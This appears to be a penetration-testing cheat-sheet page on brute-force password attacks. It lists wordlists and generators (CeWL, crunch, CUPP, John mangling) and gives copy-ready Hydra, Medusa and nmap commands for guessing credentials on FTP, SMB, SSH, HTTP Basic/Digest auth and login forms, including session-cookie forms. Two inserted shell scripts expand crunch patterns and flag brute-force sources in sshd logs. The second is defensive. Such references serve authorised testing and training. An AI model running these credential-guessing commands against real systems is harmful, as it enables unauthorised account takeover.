Brute Forcing #
At a Glance #
A brute-forcing attack consists of systematically enumerating all possible candidates for the solution and checking whether each candidate satisfies the problem’s statement.
In cryptography, a brute-force attack involves systematically checking all possible keys until the correct key is found. [1]
Note: The success and efficiency of a brute-force attack rely mostly on the wordlist. Use a highly-reputed one.
Default Credentials #
Note: SecLists and WordList Compendium also include default password lists.
Wordlists #
- SecLists - The Pentester’s Companion
- Probable Wordlists
- WordList Compendium
- Jhaddix Content Discovery All
- Google Fuzzing Forum
- CrackStation’s Password Cracking Dictionary
Wordlist Generation #
CeWL [2] #
cewl example.com -m 3 -w wordlist.txt
Parameters
-m <length>: Minimum word length.
-w <file>: Write the output to <file>.
Crunch [3] #
Simple wordlist.
crunch 6 12 abcdefghijk1234567890\@\! -o wordlist.txt
String permutation.
crunch 1 1 -p target pass 2019 -o wordlist.txt
Patterns.
crunch 9 9 0123456789 -t @target@@ -o wordlist.txt
Parameters
<min-len>: The minimum string length.
<max-len>: The maximum string length.
<charset>: Character set.
-o <file>: Specifies the file to write the output to.
-p <charset or strings>: Permutation.
-t <pattern>: Specifies a pattern, e.g. @@pass@@@@, where @ inserts lower case characters, the comma (,) inserts upper case characters, % inserts numbers and ^ inserts symbols.
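Before running crunch with a pattern it is worth knowing how many candidates the pattern expands to, because each placeholder multiplies the keyspace by the size of its character set. The script below is an added example, not crunch's own code or part of this page: it implements the same placeholder semantics (@ lower case, comma upper case, % numbers, ^ symbols, everything else literal) in plain POSIX sh, with deliberately tiny character sets so the output stays readable. The character sets and the sample patterns are constructed for the demo.

```shell
#!/bin/sh
# Added example (not crunch's code): size and expand a crunch-style -t pattern.
# Tiny constructed character sets keep the demo output small.
LOWER='abc'
UPPER='AB'
DIGITS='01'
SYMBOLS='!$'

# charset_for CHAR: print the character set a placeholder stands for,
# or nothing when CHAR is a literal character.
charset_for() {
    case $1 in
        @) printf '%s' "$LOWER" ;;
        ,) printf '%s' "$UPPER" ;;
        %) printf '%s' "$DIGITS" ;;
        ^) printf '%s' "$SYMBOLS" ;;
        *) ;;
    esac
}

# keyspace_size PATTERN: number of candidates the pattern expands to, i.e. the
# product of the set sizes of its placeholders (literals contribute a factor 1).
keyspace_size() {
    local rest="$1" size=1 c cs
    while [ -n "$rest" ]; do
        c=${rest%"${rest#?}"}      # first character of the remaining pattern
        rest=${rest#?}
        cs=$(charset_for "$c")
        if [ -n "$cs" ]; then
            size=$((size * ${#cs}))
        fi
    done
    printf '%s\n' "$size"
}

# expand_pattern PREFIX PATTERN: print every candidate, one per line, by
# recursing over the pattern one character at a time.
expand_pattern() {
    local prefix="$1" rest="$2" c remaining cs ch
    if [ -z "$rest" ]; then
        printf '%s\n' "$prefix"
        return
    fi
    c=${rest%"${rest#?}"}
    remaining=${rest#?}
    cs=$(charset_for "$c")
    if [ -z "$cs" ]; then
        # literal character: copy it through unchanged
        expand_pattern "$prefix$c" "$remaining"
        return
    fi
    while [ -n "$cs" ]; do
        ch=${cs%"${cs#?}"}
        cs=${cs#?}
        expand_pattern "$prefix$ch" "$remaining"
    done
}

keyspace_size 'pass@@%^'      # 3 * 3 * 2 * 2 = 36 candidates
expand_pattern '' 'x@%'       # xa0 xa1 xb0 xb1 xc0 xc1
```

With crunch's real sets (26 lower case, 26 upper case, 10 digits, 33 symbols) the same arithmetic explains why a pattern such as @target@@ with a full charset is cheap while a few unconstrained positions are not.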
Password Profiling #
CUPP [4] #
cupp -i
Parameters
-i: Interactive questions for user password profiling.
Word Mangling #
john [5] #
john --wordlist=wordlist.txt --rules --stdout
Parameters
--wordlist <file>: Wordlist mode, read words from <file> or stdin.
--rules[:CustomRule]: Enable word mangling rules. Use the default rules or add [:CustomRule].
--stdout: Output candidate passwords.
Note: Custom rules can be appended to John's configuration file john.conf.
Services #
FTP #
See Combo (Colon Separated) Lists.
Hydra [6] #
hydra -v -l ftp -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 ftp
Parameters
-v: verbose mode.
-l <user>: login with <user> name.
-P <passwords file>: login with passwords from file.
-f: exit after the first found user/password pair.
SMB #
Hydra [6] #
hydra -v -t1 -l Administrator -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 smb
Parameters
-v: verbose mode.
-t <tasks>: run <tasks> number of connects in parallel. Default: 16.
-l <user>: login with <user> name.
-P <passwords file>: login with passwords from file.
-f: exit after the first found user/password pair.
smb-brute NSE Script #
sudo nmap --script smb-brute -p U:137,T:139 10.0.0.3
SSH #
Hydra [6] #
hydra -v -l <user> -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 ssh
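Seen from the target's side, every guess made by the Hydra commands above leaves one failed-login line in the service log, so a single source accumulates failures far faster than a user mistyping a password. The script below is an added example, not part of this page or of Hydra: it parses sshd log lines (the lines, host name and addresses are constructed for the demo) and reports sources at or above a failure threshold, together with the user names each source tried, which separates a single-account brute force from a run over a user list.

```shell
#!/bin/sh
# Added example (not Hydra's or the page's code): spot brute-force sources in
# sshd log lines. AUTH_LOG is constructed for the demo.
AUTH_LOG='Mar  3 10:15:01 host sshd[2201]: Failed password for invalid user admin from 10.0.0.9 port 51000 ssh2
Mar  3 10:15:01 host sshd[2202]: Failed password for invalid user admin from 10.0.0.9 port 51001 ssh2
Mar  3 10:15:02 host sshd[2203]: Failed password for root from 10.0.0.9 port 51002 ssh2
Mar  3 10:15:02 host sshd[2204]: Failed password for root from 10.0.0.9 port 51003 ssh2
Mar  3 10:15:02 host sshd[2205]: Failed password for root from 10.0.0.9 port 51004 ssh2
Mar  3 10:15:03 host sshd[2206]: Accepted password for alice from 10.0.0.5 port 52000 ssh2
Mar  3 10:15:09 host sshd[2207]: Failed password for alice from 10.0.0.5 port 52001 ssh2
Mar  3 10:15:10 host sshd[2208]: Accepted publickey for bob from 10.0.0.7 port 53000 ssh2'

# failed_logins: parse the "for [invalid user] NAME from IP" clause of every
# failed password attempt and print "IP USER", one line per failure.
failed_logins() {
    printf '%s\n' "$AUTH_LOG" |
    awk '/sshd\[[0-9]+\]: Failed password for / {
            for (i = 1; i <= NF; i++) {
                if ($i == "for") user = ($(i+1) == "invalid") ? $(i+3) : $(i+1)
                if ($i == "from") ip = $(i+1)
            }
            print ip, user
        }'
}

# failures_by_source: "IP COUNT" per source, most failures first.
failures_by_source() {
    failed_logins | awk '{ n[$1]++ } END { for (ip in n) print ip, n[ip] }' |
    sort -k2,2nr -k1,1
}

# brute_sources THRESHOLD: sources with at least THRESHOLD failed logins.
brute_sources() {
    failures_by_source | awk -v t="$1" '$2 >= t { print $1 }'
}

# targeted_users IP: distinct user names tried from one source. One name means
# a single-account brute force (Hydra -l); several mean a user list (-L).
targeted_users() {
    failed_logins | awk -v ip="$1" '$1 == ip { print $2 }' | sort -u
}

brute_sources 3          # 10.0.0.9
targeted_users 10.0.0.9  # admin, root
```

On a live host the same awk runs over /var/log/auth.log or the journal; the threshold should be low enough to catch a -t1 run but above the handful of failures a legitimate user produces, and the finding feeds an account lockout or a fail2ban-style block rather than just a report.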
Web Applications #
HTTP Basic Auth #
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/
HTTP Digest #
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/
HTTP POST Form #
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed"
Parameters
-l <user>: login with <user> name.
-L <users-file>: login with users from file.
-P <passwords file>: login with passwords from file.
http-head | http-get | http-post-form: service to attack.
HTTP Authenticated POST Form #
Append the Cookie header with the session id to the options string, e.g., :H=Cookie\: security=low; PHPSESSID=if0kg4ss785kmov8bqlbusva3v. [6]
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v"
Miscellaneous #
Combo (Colon Separated) Lists #
Hydra [6] #
Use a colon separated login:pass format instead of the -L/-P options.
hydra -v -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -f 10.0.0.3 ftp
Parameters
-v: verbose mode.
-C <user:pass file>: colon-separated "login:pass" format.
-f: exit after the first found user/password pair.
Medusa [7] #
Medusa's combo files (colon-separated) should be in the format host:username:password. If any of the three values is missing, the respective information should be provided either as a global value or as a list in a file.
sed s/^/:/ /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt > /tmp/cplist.txt
medusa -C /tmp/cplist.txt -h 10.0.0.3 -M ftp
Parameters
-u <user>: login with <user> name.
-P <passwords file>: login with passwords from file.
-h: target hostname or IP address.
-M: module to execute.
Further Reading #
[1] Contributors to Wikimedia projects. "Brute-Force Search." Wikipedia, the Free Encyclopedia, Wikimedia Foundation, Inc., 13 Oct. 2002, https://en.wikipedia.org/wiki/Brute-force_search.
[2] digininja. "CeWL: CeWL Is a Custom Word List Generator." GitHub, https://github.com/digininja/CeWL/.
[3] "Crunch - Wordlist Generator Download." SourceForge, https://sourceforge.net/projects/crunch-wordlist/.
[4] Mebus. "Cupp: Common User Passwords Profiler (CUPP)." GitHub, https://github.com/Mebus/cupp.
[5] magnumripper. "JohnTheRipper." GitHub, https://github.com/magnumripper/JohnTheRipper.
[6] Heuse, Marc. "Thc-Hydra: Hydra." GitHub, https://github.com/vanhauser-thc/thc-hydra. Accessed 12 May 2020.
[7] "Foofus Networking Services - Medusa." Foofus.Net Advanced Security Services Forum, http://foofus.net/goons/jmk/medusa/medusa.html.